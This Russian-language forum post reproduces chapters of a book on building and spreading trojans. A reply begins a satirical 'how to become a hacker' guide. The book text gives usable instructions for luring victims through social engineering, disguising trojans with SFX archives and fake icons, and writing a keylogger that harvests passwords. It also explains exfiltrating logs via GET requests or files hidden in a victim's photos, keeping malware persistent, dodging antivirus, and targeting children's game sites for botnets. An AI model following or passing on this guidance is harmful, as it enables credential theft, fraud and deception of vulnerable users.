    Человек получает письмо от “доброго” хакера, в котором написано – Долгое время я читал твой архив переписки. Я выбрал самые интересные моменты и сейчас посылаю их тебе. Поменяй пароль на почту, и больше не применяй таких слабых паролей. Во вложении, под именем Архив переписки, находится естественно троян, который устанавливает кейлоггер, следящий за нажатиями клавиш. Параллельно троян создает документ, который наполняет фразами, вытянутыми из настоящего архива агента на компьютере пользователя Человек меняет пароль, кейлоггер записывает нажатия клавиш нового пароля и передает информацию хакеру
    Если есть непосредственный контакт в реале с жертвой можно использовать оригинальный способ получения логов через флешки. Жертве на время дается ваша флешка, на которой среди других файлов, расположен html файл с ОПРЕДЕЛЕННЫМ именем. Троян, заранее установленный на компьютер жертвы, отслеживает все флешки втыкаемые в компьютер и ищет на них именно этот файл, если находит, то записывает в комментарии этого html свои логи.
    Допустим, имеется человек неравнодушный к компьютерам и веб-дизайну.
    Для того чтобы он перешел по нужной нам ссылке достаточно написать такое письмо
    Здравствуйте уважаемый Вася Пупкин
    Вас беспокоит администрация www.бяка.ру
    Мы хотели бы оповестить вас о том, что мы проводим набор модераторов на наш форум.
    Подробности вы можете узнать здесь: http://www.бяка ру/?t=47
    С уважением, администрация www.бяка.ру
    Один хакер создал себе амплуа компьютерщика, который всем помогает. В разговоре с жертвами, он спрашивал, какие глюки есть у них на компьютере. Далее зацепившись за описание их глюков, он уверял, что это новый вирус такой то и у него против него есть антивирусный патч люди скачивали патч от доброго компьютерщика и патч устанавливая им трояна писал в это время на экране что вирус найден и обезврежен. Это называется обратная социальная инженерия – сперва создается проблема у пользователя, а потом хакер помогает жертве, заодно устанавливая необходимые трояны или скачивая нужную ему информацию.
    Целью обратной социальной инженерии является заставить цель саму обратиться к злоумышленнику за «помощью». Это ты наверняка и сам юзал, даже не отдавая себе в том отчета. Ну да, когда ты Ленке, в школе хвалился какой ты весь из себя компьютерный гений, а потом убивал файл BOOT.INI. Разумеется, чтобы она прибежала к тебе и просила починить компьютер. Один мой знакомый ходил устанавливать Windows, дав объявление в газете. После установки системы, настраивая интернет, он спрашивал у юзеров пароли и логины на подключение к тарифам и потом, зная эти пароли, без проблем сидел в интернете на халяву.
    Другой хакер придумал несложную идею распространения своего трояна другими людьми. Он написал, что вот мол, есть программа, которая расшаривает на компьютере папки, так, что они становятся общедоступными, и потом вы можете влезть в них через интернет без всякого труда. Просто пошлите эту программу своему другу, и когда его папки станут общедоступны, вы сможете порыться в них через интернет. Таким способом наш хакер запудрил мозги малолетним кулхацкерам, и они сами устанавливали себе и своим жертвам волшебную программу, а программа была не что иное как часть ботнета. В последующем хакер использовал их компьютеры как сеть для распределенных DDOS атак
    Кодеры, они же программисты народ подозрительный и просто так трояна им не впаришь... Народ они подозрительный, но весьма тщеславный... Допустим, наша жертва мнит себя великим программистом на Дельфи... Например, сидит он где-нибудь в форуме и изредка помогает людям с их программами... И вот тут появляешься ты, стучишь к нему в аську или в приват, и, восхищаясь его умом, просишь помочь найти ошибку в твоем Дельфи проекте... В папке с проектами лежит твой троян переименованный из .ехе в .rеs ... А проект твой использует .dllку которая при запуске программы быстренько копирует трояна в нужную папку переименовывает в .ехе и запускает... Великий кодер, не углубляясь в дебри .dll, видит твой проект какой-то программы, быстро находит нужную ошибку и с умным видом указывает тебе на нее... Все довольны... Троян установлен
    Под видом симпатичной девушки-ламмера идем в чат или на форум, и жалуемся, что ну никак не получается разобраться в новой программе, которую недавно скачала. Программа обязательно должна быть ранее никому неизвестной и интригующей. Можно выложить скриншоты для подогревания интереса. Обязательно найдется куча умников, желающих помочь красивой и глупой девушке. Они сами скачают, распакуют, и установят у себя интересную программу (главное чтобы она не слишком много весила). Описание программы можно приводить любое, можно даже создать красочный липовый интерфейс, который не будет работать, выдавая сообщения о нехватке какой нить .dll
    Недавно я увидел любопытный способ маскировки ссылок - Цитата - короче вот
    фотку передаю http://имясайта/12jpg
    То есть идет переход по ссылке имитирующей картинку но на самом деле,
    отсылающей пользователя в раздел сайта нужный хакеру... Как вариант можно
    на этот же сайт поставить реальную картинку с таким именем и если чел
    заметит подвох сказать, что тупо пропустил точку перед расширением
    И не нужно ко всем ломиться и кричать вот тебе моя голая фотка!!
    По этикету, фотку первым спрашивает обычно пацан, то есть потенциальный лох, если Вы не забыли, то мы сидим под телкой. Причем телка ломается и просит его первого отослать фотографию...
    Есть еще один любопытный метод маскировки ссылок. Допустим, вы сделали Php-скрипт на каком-то хостинге, и хотите, чтобs юзер запустил его. Некоторые хостинги позволяют указать в htacess чтобы файлы с расширениями .rаr, .jpg, .txt и другими воспринимались хостингом как нормальные рhр скрипты. Естественно ссылка на какой то файл с безопасным расширением вызовет меньше подозрений чем ссылка на рhp скрипт. А этот файл и будет нашим скриптом, у которого мы просто сменили расширение.
    Два друга жили в одном городе. Один хотел взломать другого, но не знал как, тот был крутым перцем. Несмотря на это, первому все же удалось выяснить, что тот сидит вконтакте, хоть и под другим именем. И вконтакте у него были родственники, живущие в другой стране. Среди родни была очаровательная племянница пятнадцати лет, у которой в анкете был написан ее домашний адрес. Хакер чтобы взломать друга, создал флэш-ролик с вирусом, и, взяв маленький мини СD диск, записал туда кучу фоток родни жертвы, взятых с различных социальных сетей и пару тройку флэш роликов. Потом написал бумажное письмо от имени племянницы, и вложив в конверт мини СD с фотографиями и роликами кинул это письмо от родственников в почтовый ящик жертвы. Тот, привыкший проверять все электронные письма, в бумажном письме опасности не усмотрел и повелся. Диск был благополучно поставлен в привод, а ролики с вирусом запущены
    Пользователю через почту сообщается, что его аккаунт на каком-либо сайте был взломан и используется для рассылки спама, поэтому для обеспечения безопасности были изменены его данные для входа. Во вложении к письму находится документ Word, в котором содержится новый пароль. Однако, под обычной иконкой Word-а скрывается троянская программа.
    Бывает, почтовые клиенты фильтруют письма, содержащие какие-либо ключевые слова, часто применяемые хакерами для развода пользователей. Недостатки фильтрации входящих писем по "запрещенным" словам - это невозможность предусмотреть все варианты написания слов. К примеру, если взломщику становится известно, что программа реагирует на слово «пароль» и слово «указать», злоумышленник может заменить их на «пассворд» и, соответственно, «ввести». Так же стоит принимать во внимание возможность написания слов с заменой кириллических букв латиницей для совпадающих символов (a, c, e, o, p, x, y,A,B,C,E,H,K,M,O,P,T,X). Такая технология в свое время применялась студентами, против систем антиплагиата, которыми ВУЗы пытались проверять качество оригинальности текстов дипломных и курсовых работ. Студенты-хакеры даже разработали специальный Windows-шрифт, в котором изображения букв не соответствовали их кодам, и программу позволяющую писать им обычные тексты. Для глаз человека документ был вполне читабельным, для систем антиплагиата он казался бессмысленным набором случайных символов
    Практические задания:
    1) Найдите в поисковиках
    - Visual Basic как ловить нажатия клавиш
    - Visual Basic как скрыть окно
    - Windows 7 методы автозагрузки
    -Visual Basic работа с файлами
    - Visual Basic получить список процессов
    - Visual Basic работа с реестром
    - Описание реестра Win 7
    - Visual Basic послать письмо через CDO
    - Reshacker

    Глава 5. Как замаскировать трояна
    Можно использовать WinRar в качестве джойнера. Берем программу - троян запаковываем ее в SFX самораспаковывающийся архив, на вкладке параметры SFX ставим галочку скрыть все чтобы распаковывалось невидимо, далее либо ставим галочку поместить ярлык на программу в автозагрузку (указываем путь к трояну в строке ярлыка) либо если наша программа сама прописывается в реестр на автозагрузку при первом запуске то ставим галочку выполнить после распаковки. Получается такой архивчик - щелкнешь по нему и троян самоустановится куда надо или даже самозапустится сразу. В такой архив, кроме вашего трояна, можно поместить файл установки какой-нибудь реально-полезной программы, которая запустится параллельно с трояном, и с виду ваш SFX архив ничем не будет отличаться от ее установки.… После того как архив сделан, я открываю его в Reshackere, и меняю значок на значок реальной программы (или игры).
    Троян может не действовать сразу - я например, делаю троянов, которые сначала считают некоторое количество дней, и лишь потом активизируются - тогда намного труднее обнаружить, откуда трояна занесли.
    Троянов лучше использовать не для уничтожения компов (если конечно это не компьютер вашего врага) а для шпионажа паролей и других вещей приносящих вам выгоду. У хакера должны быть минимум два вида троянов – для точечных и массовых ударов. Точечные трояны применяются редко, по интернету массово не распространяются (из за этого практически не ловятся антивирусами), и затачиваются под конкретную жертву. Массовые трояны, наоборот активно распространяются среди огромного числа пользователей сети с помощью зараженных сайтов и файлообменных сетей. Они должны постоянно обновлять свой программный код, чтобы успешно бороться с антивирусной защитой.
    Помните, что троян либо должен маскироваться по прогу которую используют каждый день и обладать всеми соответствующими возможностями либо быть абсолютно невидимым и на панели задач и в списке процессов и даже в папке, где он лежит (я, например, делал трояна который на время работы копирует себя в другое место, и только оттуда запускается в боевом режиме). Можно заменять легальные программы вроде Paint или Word трояном, сделав что после того как троян запустится он запустит переименованный файл легальной программы передав ей все параметры командной строки которые ей предназначались. Можно заменять не сами программы, а их ярлыки на рабочем столе. Трояны могут скачивать свои настройки с сайтов автора трояна, могут посылать хакеру украденные данные, могут даже следить за квартирой в режиме online, если на компьютере установлена WEB камера. Лучше всего закачивать на компьютер жертвы не один, а сразу несколько мелких троянов, действующих и передающих информацию по разным принципам. Тогда, если удалят один, есть шанс, что останутся остальные
    Если кусочков кода вашего вируса нет в базе сигнатур антивируса, то, как правило, этот вирус не палится. Однако существуют еще злые системные администраторы, которые могут найти ваш вирус в реестре, в списке процессов, или просто обнаружив какие-то признаки действия этого вируса. В
    таких случаях, вирус будет снесен вручную. Чтобы не допустить этого, нужно писать вирусы, состоящие из многих частей, каждая из которых использует для автозагрузки различные способы, различные ветви реестра, разные имена процессов и способы заражения. Каждая часть одного вируса должна уметь восстанавливать другую, каждый раз используя новое имя, и изменяя размер
    .ехе путем запихивания в него текстового мусора, причем восстанавливать основную часть вируса можно не сразу, а спустя несколько дней. Также части вируса могут самоуничтожаться при открытии папки с ними, восстанавливаясь впоследствии. Какая-то из частей всегда должна быть непосредственно в памяти, чтобы можно было восстановить другие. Хотя можно полностью
    выгружать вирус из памяти во время например нажатия клавиш Сtrl+Alt.. Это позволит избежать обнаружения и полного удаления вируса.
    Как обычно юзер вручную чистит автозагрузку? - он видит в ней файл вируса, удаляет его, и радуется жизни. Представим троян, который, запустившись из автозагрузки, параллельно запускает программу-спутник, которая следит чтобы основную программу - троян не удалили и не убрали из автозагрузки, если же подобное происходит, по истечения некоторого времени восстанавливает основной троян из его резервной копии спрятанной в недрах системы
    Как то странно работают современные антивирусы. Берем значит EXE-шник вируса, ставим ему иконку от документа Word, называем его имя.dос куча пробелов .ехе
    Что имеем? Антивирус ругается на то, что файл вирус. И вычисляет он его как раз по иконке и куче пробелов в имени. Переименовываем так, чтобы было около 200 символов в имени, не пробелов. Открываем .ico иконку Word-a в графическом редакторе GIMP, ставим пару серых точек то тут, то там на каждом слое изображения. Сохраняем изменения. Внешне иконка практически не изменилась, но зато мы теперь имеем EXE-шник внешне похожий на файл Word, который, ни разу не палится антивирусом, и при этом имеет достаточно длинное имя, чтобы скрыть истинное расширение файла.
    Кейлоггер - это невидимый троян, который шпионит. Например, кейлоггер поставился на автозагрузку в реестре, каждый раз загружается при загрузке компьютера, и все время сидит в памяти. Обычно шпионы шпионят за клавиатурой - они просто следят, какие клавиши нажимает юзер и при определенных условиях начинают записывать последовательность клавиш в файл (данные шифруются обычно каким-нибудь несложным способом, чтобы никто ничего не понял, если этот файл найдут). Практически все стандартные кейлогеры палятся антивирусами, поэтому придется писать свой - на Delphi или на Visual Basic используя нехитрую функцию GetAsyncKeyState(код клавиши). Эта функция есть как в Delphi, так и в VB - она опрашивает состояние какой либо клавиши и возвращает истину, если клавиша нажата. Если мы создадим событие таймера, который работает каждые 100 миллисекунд и впихнем в это событие опрос всех клавиш и записывание в текстовое поле нажатых - получится простейший кейлоггер, который не будет ничем палиться. Так как наши русскоязычные пользователи редко набирают в браузере что-то английскими буквами, для выуживания пароля достаточно следить только за информацией, набранной в английской раскладке, буквами, цифрами и знаками препинания (забей в гугл: Как определить текущую раскладку клавиатуры). При определенных условиях - например, когда троян видит что юзер полез в свой ящик(тогда следующими клавишами будут, скорее всего логин и пароль) - кейлоггеру достаточно проследить 30-50 последующих нажатий среди них будут и логин и пароль. Пароли на почту к тому же часто вводят в браузере, когда лезут в Мой Мир менять фотки, поэтому наш кейлоггер должен уметь получить список процессов (забей в гугл: Получение списка процессов) и записывать лог, только если в этом списке присутствует в текущий момент какой нить из общеизвестных браузеров (забей в гугл: Имя процесса Оперы). Так мы сильно сократим размер логов кейлоггера, но все равно, все это будет достаточно неудобочитаемо - потом для обнаружения пароля придется искать в бессмысленном наборе букв повторяющиеся последовательности. Для удобочитаемости можно добавлять пробел в лог если в течении десяти секунд пользователь не вводит никаких новых английских букв, не добавляя этот самый пробел если он итак последний в логе чтобы пробелов между информацией было не куча а один. Не забывайте ловить нажатия Shift и Caps Lock, чтобы понять заглавная или незаглавная буква нажаты.
    Посылать нашпионенную информацию можно через параметры get запроса на ваш сайт, через обращение к нему через стандартный системный браузер. Например, при старте браузера вместо домашней страницы ваша программа переадресует браузер на ваш сайт, передает в get запросе порцию украденной текстовой информации, а после переадресовывает браузер на реальную домашнюю страницу юзера. При достаточной скорости интернета, пользователь просто не замечает эти действия нашего трояна
    В Win7 под правами обычного юзера возникает проблема, куда писать лог, если везде выскакивает предупреждение типа Разрешить приложению внести изменения в файловую систему? Но эта проблема решается, если лог писать в папку Общие документы (туда редко кто заглядывает). Точно так же решается проблема с автозагрузкой - достаточно скопировать кейлоггер в стандартную папку автозагрузки, предназначенную для все пользователей (забей в гугл: Автозагрузка в Windows 7). Желательно делить троян на две или три части - одна закидывает две остальные в автозагрузку, другая пишет лог, третья лог отправляет хакеру. Об отправлении логов поговорим подробнее. Почти все кусочки кода, отправляющие письма на e-mail (забей в гугл: Отправить письмо с вложением Visual Basic) палятся антивирусами как программы, совершающие подозрительные действия. Касперский вообще обзывает так все программы, которые пытаются отправить GET запрос или послать письмо. Однако обзываясь, что поведение похоже на что то там эдакое, Каспер пропускает через себя это самое письмо, просто предупреждая юзера что вот, мол, вирус типа что-то сделал а может это и не вирус вовсе но мое дело предупредить. Письмо с логами при этом в большинстве случаев доходит до хакера без проблем. Однако из за паники Каспера после предупреждения троян может быть удален умным пользователем. Поэтому часть трояна посылающая нам лог от жертвы должна активизироваться не очень часто - например, не раньше чем через десять дней после заражения - чтобы лог успел наполниться паролями. Кроме этого можно реализовать чтобы вирус скрытно записывал лог в какие либо файлы пользователя (картинки, или в MP3 теги песенок, комментарии html файлов и.т.д.) и потом можно просто попросить наивного юзера прислать вам какой-нибудь его файл – например - фотку. Пользователь вряд ли когда нить догадается, что во все его фото на винчестере цветными точками зашифрован лог с кейлоггера гг. Хотя в большинстве случаев достаточно просто отправки трояном письма. Можно сделать, чтобы троян состоящий из трех частей сперва копировался не в автозагрузку, а в какую либо папку откуда впоследствии мог бы быть восстановлен, если его удалят. Пользователь может вычистить всю автозагрузку, но достаточно подменить какой-нибудь AIMP на файл установщика трояна который параллельно запускает настоящий AIMP и, хоть сколько ты потом чисти автозагрузку - при первом же запуске AIMP-a пользователем троян восстановит свои удаленные части. Причем он может сделать это не сразу, а через пару дней, когда бдительность пользователя поутихнет - и ему покажется, что чистка автозагрузки увенчалась успехом.
    Можно переименовать 1.exe троян в 1.jpg и создать для него ярлык с параметрами
    Объект: %windir%\system32\cmd.exe /c 1.jpg
    Рабочая папка: %currentdir%
    Окно: Свернутое в значок
    Таким образом, мы можем запустить exe-шник вне зависимости от его расширения.
    Особенно интересна такая схема – создается html учебник на интересующую жертву тему. Предполагается что хакер уже знаком с жертвой через подставной ник (они сетевые друзья). Под любым предлогом впариваем этот документ жертве. Можно просто болтать с ней в Сети, перевести разговор на тему увлечений жертвы и прислать этот файл типа – о, а знаешь, у меня на эту тему есть книжка классная. Щас пришлю.. Учебник кроме html страниц содержит exe-шник переименованный в html и ярлык с именем index.htm и командами запускающими троян. Причем троян установившись делает три вещи – во первых, он запускает настоящий html файл учебника чтобы у юзера не возникало подозрений, во вторых он копирует себя в автозагрузку и крадет пароли, постоянно следя за нажатиями клавиш. В третьих он мониторит расположение html учебника на винчестере и если он там есть записывает в комментарии html страничек украденные пароли. Так как комментарии html кода при открытии .html в браузере не видно, внешне ничего не изменяется, разве что документ изменяет вес на несколько килобайт. Впоследствии хакер напишет юзеру жалобное письмо что сгорел винчестер и копий того замечательного учебника (ну помнишь я тебе присылал) не осталось. Юзер говорит – Без проблем – и посылает назад хакеру копию учебника – но троян уже записал в комментарии файлов учебника пароли юзера. Эта схема пробивает любую антивирусы и файерволы поскольку украденная трояном информация, по сути, добровольно отсылается хакеру пользователем
    Можно ловить нужное время для включения записи информации с клавиатуры в файл по имени текущего окна в котором клавиши жмутся или по имени сайта, на котором сейчас пользователь – например, номера и пин-коды пластиковых карт типа виза когда ими юзер оплачивает что-нибудь по интернету. Internet Explorer, вплоть до последних версий, позволял получать сторонним программам html код загруженных в него страниц. Также эти страницы можно вытащить из кэша браузера. Когда пользователь регистрируется на каком то сайте частенько ему приходит письмо о завершении регистрации с логином и паролем. Если мониторить все страницы загружаемые браузером то при чтении письма содержащим слова password или пароль троян сможет сохранить их копии и передать их хакеру. Если отслеживать короткие фрагменты английского текста которые появляются в буфере обмена то вполне вероятно поймать скопированный откуда-то пароль на тот сайт, который в текущий момент открыт в браузере. Трояны также могут делать снимки экрана, то есть сохранять текущую картинку на экране в файл, красть файлы, в которых программы хранят пароли (хэши), куки, ну и многое другое
    Наиболее продвинутые трояны качают команды для дальнейших действий с сайта своего автора, как уже говорилось ранее. Прежде чем отправлять троян жертве протестируйте, чтобы он не ловился ни одним свежим антивирусом. Если у вас конкретная жертва, не включайте в троян механизм размножения, вполне хватит одной его копии, установленной на компьютере жертвы. Кейлоггеры надо писать самому , потому что чужие кейлоггеры которые распространят по Интернету обычно настроены так что посылают украденную информацию не только вам на ящик, но и на ящик того кто их создал изначально.
    Для построения ботнетов (сеть троянов для DDOS атак), и распространения вирусов часто используются детские и женские сайты с мини-играми. Дети и женщины – наиболее уязвимы, по причине недостаточной технической грамотности.. Вероятность того, что четырёхлетний ребенок нажмёт на большую зеленую кнопку с надписью «Скачать», гораздо выше, потому что он не задумывается над тем, что преступники могут получить доступ к банковским реквизитам его папы..
    Можно искать e-mail-ы владельцев сайтов на этих сайтах и засылать им на почту кейлоггеры, которые дождутся момента, когда хозяин сайта будет обновлять свой сайт через FTP и украдут для вас пароль. Можно выкладывать на популярные среди веб-дизайнеров сайты собственноручно написанный вполне нормально работающий FTP менеджер, параллельно крадущий пароли от сайтов. Можно маскировать ваш фальшивый менеджер под популярные, а можно создать свой..
    Популярный FTP клиент FileZilla после подключения к новому серверу сохраняет все данные о нем, включая IP, порт, логин и пароль в файле, для доступа к которому не требуются даже права администратора! Сам виновник торжества хранится в директории \AppData\Roaming\FileZilla\recentservers.xml.
    Пользователю предлагается заманчивая программа, устанавливая которую он параллельно ставит вирус. Вирус провоцирует сбой mail агента. При первом старте переустановленного пользователем агента он перехватывает нажатия клавиш логина и пароля. Далее вирус ищет на диске все картинки формата .jpg и по очереди вшивает в каждый файл каждой картинки украденный логин и пароль. Вирус составляет список уже обработанных картинок, чтобы не повторяться. Через некоторое время хакер обращается с просьбой к жертве прислать свое фото. Таким образом, хакер получает пароль, зашитый в картинку фото.
    Юзер заходит на какой либо сайт и у него в браузере выскакивает jаvа окошко с предупреждением о вирусной опасности и необходимости скачать и установить критические обновления на антивирус.. Вместо обновлений естественно устанавливается троян
    Иногда бывает что какой либо антивирус, установленный у будущей жертвы вам сильно мешает - однако если жертва недостаточно умна то это легко обойти - достаточно закинуть человеку на компьютер безобидную программу, которая постоянно выводит на экран окошко с надписями типа - У вашего антивируса истекла лицензия, ваш компьютер больше не защищен и.т.д. Дальше - два варианта либо вы советуете челу поставить другой антивирус, либо впариваете фальшивый
    Для автозапуска вирусов без использования автозагрузочных записей могут применяться следующие технологии –
    1) подмена ярлыков часто запускаемых программ на рабочем столе и в меню Пуск..
    2) подмена программ ассоциированных с открытием файлов определенного формата. Тогда при открытии файла этого формата произойдет запуск вируса. При этом можно параллельно с выполнением кода вируса передавать все параметры командной строки старой программе, которая раньше открывала этот тип файла, чтобы внешне все оставалось как раньше
    А теперь, немножко пофантазируем на тему умных троянов. Представим себе скрипт на некоем сервере. Скрипт бродит по страницам анкет какой-нибудь социальной сети (та же mail.ru), и ищет в анкетах уникальные интересы людей. Например, нашелся человек - фанат группы Nightwish (как я)). Наш умный скрипт вводит в поисковые системы запрос Nightwish, ищет RSS новости по этой теме, бродит по найденным поисковиками сайтам и вытаскивает из них статьи про Nightwish, потом приводит эти статьи к единому дизайну путем исключения лишних html-тегов и ляпает из найденной информации небольшой сайт, фаршируя его эксплойтами, а также, вирусами и троянами в загрузках сайт. Далее ссылка на этот сайт посылается человеку на все контакты указанные им в его анкете. Получается, что троян автоматически создает направленную атаку учитывающие интересы жертвы, и использующую методы социальной инженерии. Конечно, реализовать подобное довольно сложно, но как мы знаем, для хакеров ничего невозможного не существует
    Практические задания:
    1) Найдите в поисковиках
    - Что такое крипторы
    - Чем сжать программу
    - Обфускация
    - Обход firewall
    - Обход антивируса

    Глава 5.1 Психология
    В повести Сергея Довлатова рассказывается, как один человек, интуитивно используя прием отвлечения внимания, украл с завода ... трактор!
    - Зашел на комбинат. Сел в трактор. Сзади привязал железную бочку. Еду на вахту. Бочка грохочет. Появляется охранник: "Куда везешь бочку?" Отвечаю: "По личной надобности". - "Документы есть?" - "Нет". - "Отвязывай к едрене фене"... Я бочку отвязал и дальше поехал. В общем, психология сработала... А потом мы этот трактор на запчасти разобрали"
    В первую очередь интернет хорош тем, что в нем можно себя выдать за кого угодно. Он, в отличие от телефона, не держит в рамках возраста и пола. К тому же, ты можешь использовать для обмана жертв кучу разных персонажей, создавая второстепенными героями иллюзию нужного качества у основного. Например, если ты зайдешь на форум и крикнешь: Я крутой писатель" - тебя хрен кто заметит. Но если с разных окон из под прокси заведешь себе на том же чате толпу фейковых ников, наперебой хвалящих твои писательские таланты, остальной народ сразу заинтересуется и начнет расспрашивать, чего ты там пишешь. Так как в сетевой социальной инженерии фальшивые личности используется повсеместно, ты должен хорошо позаботиться о том, чтобы они выглядели реалистично. Биография, характер, стиль письма, подписи, координаты в сети (мыло, сайт) - ты должен продумать все, чтобы любой неверующий смог сколько угодно раз убедиться в реальности твоего виртуала.
    Хорошо соврать можно, если искренне поверить в правоту своих лживых слов. Ты должен ни секунды не сомневаться, том, что говоришь.. При этом лишняя эмоциональность ни к чему. Ведь когда ты идешь в конце рабочего месяца получать зарплату, ты же не испытываешь какого-то дискомфорта от этого, не скулишь жалобно, пытаясь выпросить лишнюю копейку? Ты получаешь то, что заслужил, что твое по праву… Того же принципа нужно придерживаться и в социальной инженерии. Если ты сумеешь убедить человека в своих правах, то обретешь требуемое, даже если на самом деле никаких прав на него не имеешь
    При проведении важного разговора с жертвой нужно выбрать правильное место и правильный момент. Нужно продумать, как приступить к беседе, как снять начальное напряжение, как вызвать интерес к нужной теме, направить разговор в желаемое русло, выбрать правильный порядок предъявления аргументов, вычислить возможные контраргументы, продумать, как их нейтрализовать, наметить запасные варианты продолжения беседы, если партнер решительно заявит "нет!", четко представлять себе как завершить беседу.
    Необходимо иметь приятный для собеседника внешний вид (одежду, головной убор, прическу и т.д.) и выражение лица, иногда говорить комплименты, высказать какую-либо шутку (анекдот), заставляющую собеседника искренне рассмеяться.
    После выдачи очередного факта или аргумента делается небольшая пауза, для осознания и закрепления услышанного, причем каждый последующий аргумент должен быть весомее, чем предыдущий. Новые идеи надо подавать так, чтобы они ассоциировались с уже усвоенными.
    Никогда не ограничивайтесь лишь простым перечислением аргументов, а старайтесь раскрывать их логический и эмоциональный смысл с точки зрения собеседника. Приводите тот же самый аргумент несколько раз, но при этом повторяйте его новыми словами. Вычислите по реакции объекта те моменты, где разыгрывается "борьба его мотивов" и сосредоточьте на них все свое воздействие, раз за разом подавая те аргументы, которые произвели на партнера максимальное впечатление.
    Доводы партнера можно нейтрализовать - логикой опровержения, высмеиванием, изменением акцентов (выставляя их слабые места и предельно снижая сильные), впечатляющей дискредитацией их автора (но не собеседника, естественно!), ссылкой на авторитеты (иной раз вымышленные).
    Уяснив, что собеседник воспринял проводимую идею, не затягивайте дальше контакт, а конспектно обозначив основные положения, дружески распрощайтесь с ним. Постарайтесь, чтобы у партнера не возникло ощущение, что он вроде бы насильно подчинился чужой воле.
    Пожалуй, главный фактор доверия - уверенность в себе. Если кто-то говорит авторитетным голосом знатока, не допускающего возражений - люди могут поверить в любую чушь, им сказанную. В вещах, о которых человек не знает или в которых хотя бы сомневается - можно легко склонить его мнение в нужную сторону. Хороший способ создать иллюзию своей правдивости - сделать несколько заявлений, которые, как известно собеседнику, 100% правдивы, и в то же время подмешать в них несколько лживых доводов. Человек, видя, что ты говоришь правду, автоматически воспримет как правду и твою ложь.
    Использовать человеческую жадность в своих корыстных целях просто, нужно всего лишь пообещать человеку что-то, что ему необходимо. Не обязательно деньги - рекламу, информацию, предмет для коллекции, секс... Просто узнай побольше о жертве, о том, что для нее есть ценности и обещай это. Обещать ведь по закону не запрещено.
    Как ты понимаешь, любой человек намного охотнее поможет красивой девушке, чем патлатому коллеге. Это потому, что на подсознательном уровне мы часто надеемся получить от них ответную благодарность, сам знаешь, какого плана. Если у тебя есть подружка с ангельским голосом, умеющая разговаривать с парнями на многообещающих тонах - она может стать очень выгодным союзником в процессе обработки юзера. Чем больше ей удастся заинтересовать клиента, тем меньше он захочет потерять потенциальную подружку, и тем вероятнее выполнит ее просьбу.
    Конечно, всем нам хочется быть примером для подражания, разбираться в чем-то лучше других. Но если в такой момент кто-то со стороны попытается навязать мысль, что ты вовсе не лучший, естественной защитной реакцией будет доказать засранцу - именно ты лучший. Хитрость в том, что, намеренно ущемив чью-то гордость, хакер может в качестве доказательства способностей человека потребовать таких вещей, которые в противном случае ему никто бы не дал. И жертве, дабы избавиться от статуса лузера, волей-неволей придется пойти у того на поводу. Методика превосходства сложна тем, что манипулировать ей нужно очень тонко. Грубое “Слабо?” действует далеко не на всех - по большей мере на крутых самоуверенных специалистов, которые болезненно относятся к критике своих способностей. Но в мире есть куча людей, которым глубоко плевать, что ты
    засомневаешься в их некомпетентности, им проще тебя послать, чем что-то доказывать. Другой вариант – использовать обратную методику. То есть ты не занижаешь способности чела, а наоборот, возвышаешь их до небес.
    Чтобы добиться расположения человека вам нужно «встать на его сторону». В каком это смысле «встать на сторону?». Да тут все очень просто. Его интересуют рыбки? Вас они не интересуют, вы даже никогда не думали об этом. Так говорите с ним о рыбках. Говорите хоть как, если совсем не знайте ничего о рыбках, это сыграет свою роль. Слушайте его, не доказывайте свою точку зрения, а слушайте человека сами. Если вы будете слушать, спрашивать у него, интересоваться, то он подумает: «Вот! Мне задают вопросы! Моё занятие кому то интересно! Я не пустое место в этом мире». Значимость человека повышена. Если вы будете весь вечер разговаривать о рыбках, то после вашего ухода тот человек про себя скажет: «Какой же это замечательный человек! Интересный, умный». Вы не помогли сейчас человеку ничем, а просто дали ему повысить собственную значимость. Теперь, если вам что то нужно от него — говорите, он всеми силами постарается вам помочь.
    Практические задания:
    1) Найдите в поисковиках
    - Кевин Митник Искусство обмана
    - Социальная инженерия и социальные хакеры скачать книгу
    - Промышленный шпионаж
    - Методы вербовки информаторов
    - Своя разведка скачать книгу
    - Фишинг
    - Фрикинг
    - Свежие уязвимости
    - XSS уязвимости
    - SQL инъекции
    - Что такое Metasploit
    ___________________________________________________________________
    Книгу написал Иван Сараев

    MEGA
     
    Последнее редактирование: 12 янв 2017
    • Мне нравится Мне нравится x 1
  2. Антоха Уважаемый пользователь
    Антоха
    Ответить в чате

    Форумчанин

    Регистрация:
    26.12.2012
    Сообщения:
    3.289
    Симпатии:
    11.168
    Пол:
    Мужской
    Репа:
    +11.334 / 49 / -7
    Слишком много букав. Не всякий местный начинающий хакир столько осилит. Ща покажу реальный ман "Как стать хакером" (источник a888r.ru)
    Читайте до конца. В конце заметки, каждого вступившего на Путь хоккира ждёт БОНУС от Великого Кробы.


    Как стать хакером.

    Сегодня есть тонны информации по этой теме. Я решил, что сейчас самое время написать небольшое руководство о том, что действительно необходимо, для того, что бы быть хакером. Это не дерьмовый гайд для каждого желающего.

    1. Не беспокойтесь о своих навыках написания кода.

    Вам реально не нужно уметь писать код. После того, как вас приймут в андеграунд хакерской культуры - вы получите весь необходимый код от элиты в IRC. Вам достаточно научится компилировать из исходников С-кода и загружать что либо на веб-сервер.

    2. Придумайте реально злобный хакерский ник.

    Вы должны придумать больную хакерскую подпись, предпочтительнее использовать 1337 5p34k. Думайте в сторону криптографии и взлома. Хорошими примерами являются Cryp70 и System0verride, ровняйтесь на это. Просто помните, что вы должны показать, что действительно разбираетесь в хакерстве.

    3. Изучайте жаргон.

    Если вы собираетесь заниматся серьезными делами, вам просто необходимо выучить используемый хакерами жаргон. Кроме того, используйте его как можно чаще. Вы должны постоянно впечатлять людей. Вы никогда не знаете, кто скрывается с той стороны IRC-чата и следит за вами, возможно, вас даже завербуют для следующей большой Anonymous операции.

    4. Купите для твиттера подписчиков.

    Верный путь, чтобы заработать доверие - купить фолловеров и начать постить твиты. Убедитесь, что имеете более 9000 подписчиков, иначе вы просто тратите свое время. Не имеет значения, что вы не получаете комментарии или ретвиты. Никто не обращает внимание на такие вещи.

    5. Не тратьте время на дерьмовый код.

    Если вы загрузили какой либо код с exploit-DB, и он не работает, скорее всего, это дерьмовый код. Если бы они были хорошими хакерами, вам бы не пришлось разбираться с их кодом.

    6. Изучайте sqlmap.

    Изучите sqlmap и используйте его для дефейса мертвых/неактивных сайтов и семейных блогов про кошек при любой возможной ситуации. Всегда оставляйте сообщение на главной странице, которое должно быть примерно следующего содержания: "Hacked by N0tan00b". Так же не забудьте указать политический мотив, это, несомненно, оправдает ваши действия.

    7. Установите Kali, везде.

